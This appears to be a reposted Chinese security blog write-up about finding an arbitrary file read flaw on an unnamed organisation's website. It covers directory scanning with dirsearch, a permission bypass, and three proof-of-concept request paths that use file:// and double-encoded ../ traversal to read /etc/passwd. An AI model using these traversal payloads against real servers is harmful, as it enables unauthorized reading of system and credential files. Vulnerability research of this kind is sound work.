网站的页面是这样的
然后通过dirsearch工具对其进行目录扫描,发现有一个/file目录的路径
然后又通过字典继续跑,发现了burp的返回包提示说 权限不够
然后通过bypass了一下,就明显返回包数据量变大了
返回包一看,任意文件读取漏洞
POC如下:
/file/file%3a//%20//etc/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
/file/file:// //etc/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/file/file:// //etc/../../../../../../../../../../etc/passwd
具体是如何导致的,我的猜想应该是:
在后端代码中
第一个 file 可能代表一个特定的命令,这取决于它在原始环境中的使用方式。
第二个 file直接指向一个本地文件路径,例如 file:///etc/passwd 会指向本地系统的 /etc/passwd 文件。
原文始发于微信公众号(漏洞谷):某单位一次神奇的任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论